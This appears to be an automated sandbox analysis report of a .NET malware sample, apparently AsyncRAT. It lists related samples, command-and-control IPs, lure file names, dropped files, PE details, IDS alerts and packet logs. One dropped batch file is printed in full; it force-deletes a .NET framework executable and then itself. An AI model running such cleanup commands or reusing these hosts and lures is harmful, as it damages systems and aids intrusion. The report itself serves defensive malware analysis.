                                        8ft2Xvqgx2.exeGet hashmaliciousBrowse
                                        • 5.230.68.37
                                        WJRyvbvOD7.exeGet hashmaliciousBrowse
                                        • 5.230.68.37
                                        o06RIULPrN.exeGet hashmaliciousBrowse
                                        • 5.230.68.37
                                        wpljwjYfor.exeGet hashmaliciousBrowse
                                        • 5.230.68.37
                                        jNqtcYPpUY.exeGet hashmaliciousBrowse
                                        • 5.230.68.37
                                        VPSs4oyVHT.exeGet hashmaliciousBrowse
                                        • 5.230.68.37
                                        VPSs4oyVHT.exeGet hashmaliciousBrowse
                                        • 5.230.68.37
                                        RaIizmp3oX.exeGet hashmaliciousBrowse
                                        • 5.230.68.37
                                        RaIizmp3oX.exeGet hashmaliciousBrowse
                                        • 5.230.68.37
                                        setup_x86_x64_install.exeGet hashmaliciousBrowse
                                        • 5.230.68.37
                                        6Wn3W5gOWd.exeGet hashmaliciousBrowse
                                        • 5.230.67.97
                                        OrTzQl1ZBa.exeGet hashmaliciousBrowse
                                        • 5.230.67.97
                                        kWhElUg959.exeGet hashmaliciousBrowse
                                        • 5.230.67.97
                                        07985C9819097683B7F2BC59CC7D02E0497F012187E05.exeGet hashmaliciousBrowse
                                        • 5.230.69.213

                                        JA3 Fingerprints

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        54328bd36c14bd82ddaa0c04b25ed9ads9SWgUgyO5.exeGet hashmaliciousBrowse
                                        • 162.159.133.233
                                        GU#U00cdA DE CARGA...exeGet hashmaliciousBrowse
                                        • 162.159.133.233
                                        q2D8haqKv5.exeGet hashmaliciousBrowse
                                        • 162.159.133.233
                                        TT09876545678T8R456.exeGet hashmaliciousBrowse
                                        • 162.159.133.233
                                        Original Shipping documents.exeGet hashmaliciousBrowse
                                        • 162.159.133.233
                                        TAX INVOICE_CCU-30408495_00942998_20180910_194738.exeGet hashmaliciousBrowse
                                        • 162.159.133.233
                                        RHgAncmh0E.exeGet hashmaliciousBrowse
                                        • 162.159.133.233
                                        01_extracted.exeGet hashmaliciousBrowse
                                        • 162.159.133.233
                                        INQUIRY LIST.exeGet hashmaliciousBrowse
                                        • 162.159.133.233
                                        YTHK21082400.exeGet hashmaliciousBrowse
                                        • 162.159.133.233
                                        Taskmgr.exeGet hashmaliciousBrowse
                                        • 162.159.133.233
                                        SOA.exeGet hashmaliciousBrowse
                                        • 162.159.133.233
                                        SWIFT ADVISE VD20092021.Pdf.exeGet hashmaliciousBrowse
                                        • 162.159.133.233
                                        xccHIJ0vo7.exeGet hashmaliciousBrowse
                                        • 162.159.133.233
                                        S.O.A.exeGet hashmaliciousBrowse
                                        • 162.159.133.233
                                        9Fq3K0VfLK.exeGet hashmaliciousBrowse
                                        • 162.159.133.233
                                        LFC _ X#U00e1c nh#U1eadn #U0111#U01a1n h#U00e0ng _ Kh#U1ea9n c#U1ea5p,pdf.exeGet hashmaliciousBrowse
                                        • 162.159.133.233
                                        #U0916#U0930#U0940#U0926 #U0906#U0926#U0947#U0936-34002174,pdf.exeGet hashmaliciousBrowse
                                        • 162.159.133.233
                                        DHL NOTIFICATIONS.exeGet hashmaliciousBrowse
                                        • 162.159.133.233
                                        DHL NOTIFICATION.exeGet hashmaliciousBrowse
                                        • 162.159.133.233

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                        File Type:Microsoft Cabinet archive data, 61157 bytes, 1 file
                                        Category:dropped
                                        Size (bytes):61157
                                        Entropy (8bit):7.995991509218449
                                        Encrypted:true
                                        SSDEEP:1536:ppUkcaDREfLNPj1tHqn+ZQgYXAMxCbG0Ra0HMSAKMgAAaE1k:7UXaDR0NPj1Vi++xQFa07sTgAQ1k
                                        MD5:AB5C36D10261C173C5896F3478CDC6B7
                                        SHA1:87AC53810AD125663519E944BC87DED3979CBEE4
                                        SHA-256:F8E90FB0557FE49D7702CFB506312AC0B24C97802F9C782696DB6D47F434E8E9
                                        SHA-512:E83E4EAE44E7A9CBCD267DBFC25A7F4F68B50591E3BBE267324B1F813C9220D565B284994DED5F7D2D371D50E1EBFA647176EC8DE9716F754C6B5785C6E897FA
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview: MSCF............,...................I........t........*S{I .authroot.stl..p.(.5..CK..8U....u.}M7{v!.\D.u.....F.eWI.!e..B2QIR..$4.%.3eK$J. ......9w4...=.9..}...~....$..h..ye.A..;....|. O6.a0xN....9..C..t.z.,..d`.c...(5.....<..1.|..2.1.0.g.4yw..eW.#.x....+.oF....8.t...Y....q.M.....HB.^y^a...)..GaV"|..+.'..f..V.y.b.V.PV......`..9+..\0.g...!.s..a....Q...........~@$.....8..(g..tj....=,V)v.s.d.].xqX4.....s....K..6.tH.....p~.2..!..<./X......r.. ?(.\[. H...#?.H.".. p.V.}.`L...P0.y....|...A..(...&..3.ag...c..7.T=....ip.Ta..F.....'..BsV...0.....f....Lh.f..6....u.....Mqm.,...@.WZ.={,;.J...)...{_Ao....T......xJmH.#..>.f..RQT.Ul(..AV..|.!k0...|\......U2U..........,9..+.\R..(.[.'M........0.o..,.t.#..>y.!....!X<o.....w...'......a.'..og+>..|.s.g.Wr.2K.=...5.YO.E.V.....`.O..[.d.....c..g....A..=....k..u2..Y.}.......C...\=...&...U.e...?...z.'..$..fj.'|.c....4y.".T.....X....@xpQ.,.q.."...t.... $.F..O.A.o_}d.3...z...F?..-...Fy...W#...1......T.3....x.
                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):326
                                        Entropy (8bit):3.0973509224838742
                                        Encrypted:false
                                        SSDEEP:6:kKUVdFN+SkQlPlEGYRMY9z+4KlDA3RUeOlEfcTt:cT2kPlE99SNxAhUefit
                                        MD5:6410F49E3AFF7774CB5076436A60FA66
                                        SHA1:4F9A1387925EDF4EDE03C4EC8EC3F1AFCB97CA26
                                        SHA-256:8D43C6F7B269D8D0AF466EBE1B37871782FECE8A662A4BD81F5A092097B12A6D
                                        SHA-512:73F937FA2C1C57FD03135BAB71933F77ACA22544FF7BBE299915BF5822C24E9A76AFE6BB2FB6D144B62510892DB485E5898C51BCCABEF81B471E8425C4DE9F0E
                                        Malicious:false
                                        Reputation:low
                                        Preview: p...... ........Qc.....(....................................................... ...........^.......$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.a.a.8.a.1.5.e.a.6.d.7.1.:.0."...
                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\aQKifdER74.exe.log
                                        Process:C:\Users\user\Desktop\aQKifdER74.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1721
                                        Entropy (8bit):5.39127362806184
                                        Encrypted:false
                                        SSDEEP:48:MxHKEYHKGD8AoPtHTG1hAHKKPF1qHGiD0HKeGxHK3+vxpNT:iqEYqGgAoPtzG1eqKPFwmI0qeoquZPT
                                        MD5:A25F70EB14E27BADC54BCAAFD471B0D7
                                        SHA1:BAD9E4E87715827CBE362DF7A94785DC4591A83D
                                        SHA-256:C08CF4305521B0F463807E849D806B70D7073D70C8C3633AB4E347F041442080
                                        SHA-512:CD8E23EA50159382090433358A23C7D135333E3E1A13BE01C12136333CBE25C894D5768BD81A0910701A239F5583B8A17AECAD4F4F2EDCBC6C61F8041737725A
                                        Malicious:true
                                        Reputation:low
                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\e82398e9ff6885d617e4b97e31fb4f02\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\f2e3165e3c718b7ac302fea40614c984\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5
                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log
                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:modified
                                        Size (bytes):1580
                                        Entropy (8bit):5.333386066543561
                                        Encrypted:false
                                        SSDEEP:48:MxHKXwYHKhQnoPtHoxHhAHKzvKvjHK1HxLHqHbHKgmHKx1qHj:iqXwYqhQnoPtIxHeqzyrq1RLK7qTqxwD
                                        MD5:FC2EE34659AE1A88419889814417B631
                                        SHA1:36D67A6F9160473FC145566BC9E3D441F04DF544
                                        SHA-256:6478F90B1CA1C8CF2214BF5DC5337C56DF4DEC57E44CB68AFE609E13CDF6D957
                                        SHA-512:CB0391AB2EEFEF4A363C1E88D86F647EC24A60864B0DBB128A6E7CAE4A77673F46F94CA8CACF15A6C938E32EDD3FE0F2E27535EA67CC768D8DC1453136EC5EE0
                                        Malicious:false
                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutra
                                        C:\Users\user\AppData\Local\Temp\tmpC472.tmp.bat
                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):175
                                        Entropy (8bit):5.2873882781859
                                        Encrypted:false
                                        SSDEEP:3:mKDDCMNqTtvyty8WddSN8syEQRI0dAlKDwU1hGDt+kiE2J5xAInTRIMRSwZPy:hWKqTt6LW6qsXQRnd9DNewkn23fTtxk
                                        MD5:E960C05C5E8458EEC9B4EFA278CB5B72
                                        SHA1:8DE5B431CFDEBF3B0AA5CE1672E03E1333EF0794
                                        SHA-256:AD307035385923232E3EDB29F84A4FEC8C8F1ED305158DD5F230F5DC8ECDD7D7
                                        SHA-512:5640C4C5C82815C48765DB3012E4C9FD7613E470DB80427683CC0609A3878CDA7DB4FF5DC1C3962F276FABCF69148364CC1A14ABD482DAA244CDF2191CA71ED2
                                        Malicious:false
                                        Preview: @echo off..timeout 3 > NUL..CD C:\Windows\Microsoft.NET\Framework\v4.0.30319..DEL "InstallUtil.exe" /f /q..CD C:\Users\user\AppData\Local\Temp\..DEL "tmpC472.tmp.bat" /f /q..
                                        \Device\Null
                                        Process:C:\Windows\SysWOW64\timeout.exe
                                        File Type:ASCII text, with CRLF line terminators, with overstriking
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.41440934524794
                                        Encrypted:false
                                        SSDEEP:3:hYFqdLGAR+mQRKVxLZXt0sn:hYFqGaNZKsn
                                        MD5:3DD7DD37C304E70A7316FE43B69F421F
                                        SHA1:A3754CFC33E9CA729444A95E95BCB53384CB51E4
                                        SHA-256:4FA27CE1D904EA973430ADC99062DCF4BAB386A19AB0F8D9A4185FA99067F3AA
                                        SHA-512:713533E973CF0FD359AC7DB22B1399392C86D9FD1E715248F5724AAFBBF0EEB5EAC0289A0E892167EB559BE976C2AD0A0A0D8EFC407FFAF5B3C3A32AA9A0AAA4
                                        Malicious:false
                                        Preview: ..Waiting for 3 seconds, press a key to continue ....2.1.0..

                                        Static File Info

                                        General

                                        File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):4.847626585828494
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                        • DOS Executable Generic (2002/1) 0.01%
                                        File name:aQKifdER74.exe
                                        File size:15872
                                        MD5:0d1c0270678dbf229c04ed4ec7e1a493
                                        SHA1:5c6ffd912b0ec3d6f8a255de0c57aef3daebe490
                                        SHA256:ca2f1fd98c74804cf417f07a86db13a71baed4647e919a110a82df0bfba02e85
                                        SHA512:6863910f21f6f6a76e9222e66bcdfc8be47eaaaa17e2c4274da0ab8a96f270001d851b5c0e30c30002933b0e2173f60cce6dcdb402268035170ba6a93a3f7760
                                        SSDEEP:384:UJlDvg92If34ZLRNO5VZG7trRo2+qlf4VW0vFeWV7dyaXGyOzg18a:UnDQXlqlf4IzWVZyadOzgV
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....PKa................."...........@... ...`....@.. ....................................@................................

                                        File Icon

                                        Icon Hash:89a8a0acaea68880

                                        Static PE Info

                                        General

                                        Entrypoint:0x40400e
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows cui
                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                        Time Stamp:0x614B500D [Wed Sep 22 15:47:25 2021 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:v4.0.30319
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                        Entrypoint Preview

                                        Instruction
                                        jmp dword ptr [00402000h]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x3fc00x4b.text
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x60000x164c.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x80000xc.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x3e880x1c.text
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x20000x20140x2200False0.409122242647SysEx File -4.82152111605IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                        .rsrc0x60000x164c0x1800False0.235026041667data4.53070661765IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc0x80000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                        Resources

                                        NameRVASizeTypeLanguageCountry
                                        RT_ICON0x61300x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0
                                        RT_GROUP_ICON0x71d80x14data
                                        RT_VERSION0x71ec0x274data
                                        RT_MANIFEST0x74600x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                        Imports

                                        DLLImport
                                        mscoree.dll_CorExeMain

                                        Version Infos

                                        DescriptionData
                                        Translation0x0000 0x04b0
                                        LegalCopyright
                                        Assembly Version0.0.0.0
                                        InternalNameLOVEBILLION$$$$$$$.exe
                                        FileVersion0.0.0.0
                                        ProductVersion0.0.0.0
                                        FileDescription
                                        OriginalFilenameLOVEBILLION$$$$$$$.exe

                                        Network Behavior

                                        Snort IDS Alerts

                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                        09/27/21-20:36:17.794027TCP2018581ET TROJAN Single char EXE direct download likely trojan (multiple families)4977280192.168.2.45.230.68.154
                                        09/27/21-20:36:32.614360TCP2030673ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server)1465497745.230.84.50192.168.2.4

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Sep 27, 2021 20:36:17.767744064 CEST4977280192.168.2.45.230.68.154
                                        Sep 27, 2021 20:36:17.787610054 CEST80497725.230.68.154192.168.2.4
                                        Sep 27, 2021 20:36:17.787744045 CEST4977280192.168.2.45.230.68.154
                                        Sep 27, 2021 20:36:17.794027090 CEST4977280192.168.2.45.230.68.154
                                        Sep 27, 2021 20:36:17.814059973 CEST80497725.230.68.154192.168.2.4
                                        Sep 27, 2021 20:36:17.822236061 CEST80497725.230.68.154192.168.2.4
                                        Sep 27, 2021 20:36:17.822273970 CEST80497725.230.68.154192.168.2.4
                                        Sep 27, 2021 20:36:17.822293997 CEST80497725.230.68.154192.168.2.4
                                        Sep 27, 2021 20:36:17.822319031 CEST80497725.230.68.154192.168.2.4
                                        Sep 27, 2021 20:36:17.822343111 CEST80497725.230.68.154192.168.2.4
                                        Sep 27, 2021 20:36:17.822366953 CEST80497725.230.68.154192.168.2.4
                                        Sep 27, 2021 20:36:17.822390079 CEST80497725.230.68.154192.168.2.4
                                        Sep 27, 2021 20:36:17.822415113 CEST80497725.230.68.154192.168.2.4
                                        Sep 27, 2021 20:36:17.822441101 CEST80497725.230.68.154192.168.2.4
                                        Sep 27, 2021 20:36:17.822474003 CEST80497725.230.68.154192.168.2.4
                                        Sep 27, 2021 20:36:17.836162090 CEST4977280192.168.2.45.230.68.154
                                        Sep 27, 2021 20:36:17.856134892 CEST80497725.230.68.154192.168.2.4
                                        Sep 27, 2021 20:36:17.856173992 CEST80497725.230.68.154192.168.2.4
                                        Sep 27, 2021 20:36:17.856195927 CEST80497725.230.68.154192.168.2.4
                                        Sep 27, 2021 20:36:17.856219053 CEST80497725.230.68.154192.168.2.4
                                        Sep 27, 2021 20:36:17.856257915 CEST80497725.230.68.154192.168.2.4
                                        Sep 27, 2021 20:36:17.856308937 CEST80497725.230.68.154192.168.2.4
                                        Sep 27, 2021 20:36:17.856350899 CEST80497725.230.68.154192.168.2.4
                                        Sep 27, 2021 20:36:17.856403112 CEST80497725.230.68.154192.168.2.4
                                        Sep 27, 2021 20:36:17.856426954 CEST80497725.230.68.154192.168.2.4
                                        Sep 27, 2021 20:36:17.856451035 CEST80497725.230.68.154192.168.2.4
                                        Sep 27, 2021 20:36:17.856493950 CEST80497725.230.68.154192.168.2.4
                                        Sep 27, 2021 20:36:17.856553078 CEST80497725.230.68.154192.168.2.4
                                        Sep 27, 2021 20:36:17.856597900 CEST80497725.230.68.154192.168.2.4
                                        Sep 27, 2021 20:36:17.856672049 CEST80497725.230.68.154192.168.2.4
                                        Sep 27, 2021 20:36:17.856771946 CEST80497725.230.68.154192.168.2.4
                                        Sep 27, 2021 20:36:17.856818914 CEST80497725.230.68.154192.168.2.4
                                        Sep 27, 2021 20:36:17.856870890 CEST80497725.230.68.154192.168.2.4
                                        Sep 27, 2021 20:36:17.856894016 CEST80497725.230.68.154192.168.2.4
                                        Sep 27, 2021 20:36:17.856916904 CEST80497725.230.68.154192.168.2.4
                                        Sep 27, 2021 20:36:17.856937885 CEST80497725.230.68.154192.168.2.4
                                        Sep 27, 2021 20:36:17.871309042 CEST4977280192.168.2.45.230.68.154
                                        Sep 27, 2021 20:36:17.905982971 CEST80497725.230.68.154192.168.2.4
                                        Sep 27, 2021 20:36:17.906021118 CEST80497725.230.68.154192.168.2.4
                                        Sep 27, 2021 20:36:17.906047106 CEST80497725.230.68.154192.168.2.4
                                        Sep 27, 2021 20:36:17.906063080 CEST4977280192.168.2.45.230.68.154
                                        Sep 27, 2021 20:36:17.906071901 CEST80497725.230.68.154192.168.2.4
                                        Sep 27, 2021 20:36:17.906092882 CEST80497725.230.68.154192.168.2.4
                                        Sep 27, 2021 20:36:17.906116962 CEST4977280192.168.2.45.230.68.154
                                        Sep 27, 2021 20:36:17.957710981 CEST4977280192.168.2.45.230.68.154
                                        Sep 27, 2021 20:36:18.050966978 CEST49773443192.168.2.4162.159.133.233
                                        Sep 27, 2021 20:36:18.051014900 CEST44349773162.159.133.233192.168.2.4
                                        Sep 27, 2021 20:36:18.051105022 CEST49773443192.168.2.4162.159.133.233
                                        Sep 27, 2021 20:36:18.081012964 CEST49773443192.168.2.4162.159.133.233
                                        Sep 27, 2021 20:36:18.081052065 CEST44349773162.159.133.233192.168.2.4
                                        Sep 27, 2021 20:36:18.132400036 CEST44349773162.159.133.233192.168.2.4
                                        Sep 27, 2021 20:36:18.132519960 CEST49773443192.168.2.4162.159.133.233
                                        Sep 27, 2021 20:36:18.136660099 CEST49773443192.168.2.4162.159.133.233
                                        Sep 27, 2021 20:36:18.136682987 CEST44349773162.159.133.233192.168.2.4
                                        Sep 27, 2021 20:36:18.137176037 CEST44349773162.159.133.233192.168.2.4
                                        Sep 27, 2021 20:36:18.192318916 CEST49773443192.168.2.4162.159.133.233
                                        Sep 27, 2021 20:36:18.497347116 CEST49773443192.168.2.4162.159.133.233
                                        Sep 27, 2021 20:36:18.539158106 CEST44349773162.159.133.233192.168.2.4
                                        Sep 27, 2021 20:36:18.541800976 CEST44349773162.159.133.233192.168.2.4
                                        Sep 27, 2021 20:36:18.542026997 CEST44349773162.159.133.233192.168.2.4
                                        Sep 27, 2021 20:36:18.542102098 CEST49773443192.168.2.4162.159.133.233
                                        Sep 27, 2021 20:36:18.542109013 CEST44349773162.159.133.233192.168.2.4
                                        Sep 27, 2021 20:36:18.542145014 CEST44349773162.159.133.233192.168.2.4
                                        Sep 27, 2021 20:36:18.542188883 CEST49773443192.168.2.4162.159.133.233
                                        Sep 27, 2021 20:36:18.542206049 CEST44349773162.159.133.233192.168.2.4
                                        Sep 27, 2021 20:36:18.542403936 CEST44349773162.159.133.233192.168.2.4
                                        Sep 27, 2021 20:36:18.542459011 CEST49773443192.168.2.4162.159.133.233
                                        Sep 27, 2021 20:36:18.542469978 CEST44349773162.159.133.233192.168.2.4
                                        Sep 27, 2021 20:36:18.542546034 CEST44349773162.159.133.233192.168.2.4
                                        Sep 27, 2021 20:36:18.542597055 CEST49773443192.168.2.4162.159.133.233
                                        Sep 27, 2021 20:36:18.542604923 CEST44349773162.159.133.233192.168.2.4
                                        Sep 27, 2021 20:36:18.542670012 CEST44349773162.159.133.233192.168.2.4
                                        Sep 27, 2021 20:36:18.542712927 CEST49773443192.168.2.4162.159.133.233
                                        Sep 27, 2021 20:36:18.542721033 CEST44349773162.159.133.233192.168.2.4
                                        Sep 27, 2021 20:36:18.542778015 CEST44349773162.159.133.233192.168.2.4
                                        Sep 27, 2021 20:36:18.542835951 CEST49773443192.168.2.4162.159.133.233
                                        Sep 27, 2021 20:36:18.542845964 CEST44349773162.159.133.233192.168.2.4
                                        Sep 27, 2021 20:36:18.543587923 CEST44349773162.159.133.233192.168.2.4
                                        Sep 27, 2021 20:36:18.543639898 CEST49773443192.168.2.4162.159.133.233
                                        Sep 27, 2021 20:36:18.543649912 CEST44349773162.159.133.233192.168.2.4
                                        Sep 27, 2021 20:36:18.543709993 CEST44349773162.159.133.233192.168.2.4
                                        Sep 27, 2021 20:36:18.543754101 CEST49773443192.168.2.4162.159.133.233
                                        Sep 27, 2021 20:36:18.543762922 CEST44349773162.159.133.233192.168.2.4
                                        Sep 27, 2021 20:36:18.544004917 CEST44349773162.159.133.233192.168.2.4
                                        Sep 27, 2021 20:36:18.544056892 CEST49773443192.168.2.4162.159.133.233
                                        Sep 27, 2021 20:36:18.544065952 CEST44349773162.159.133.233192.168.2.4
                                        Sep 27, 2021 20:36:18.544126987 CEST44349773162.159.133.233192.168.2.4
                                        Sep 27, 2021 20:36:18.544173002 CEST49773443192.168.2.4162.159.133.233
                                        Sep 27, 2021 20:36:18.544181108 CEST44349773162.159.133.233192.168.2.4
                                        Sep 27, 2021 20:36:18.544843912 CEST44349773162.159.133.233192.168.2.4
                                        Sep 27, 2021 20:36:18.544919968 CEST49773443192.168.2.4162.159.133.233
                                        Sep 27, 2021 20:36:18.544929981 CEST44349773162.159.133.233192.168.2.4
                                        Sep 27, 2021 20:36:18.557483912 CEST44349773162.159.133.233192.168.2.4
                                        Sep 27, 2021 20:36:18.557538033 CEST44349773162.159.133.233192.168.2.4
                                        Sep 27, 2021 20:36:18.557555914 CEST49773443192.168.2.4162.159.133.233
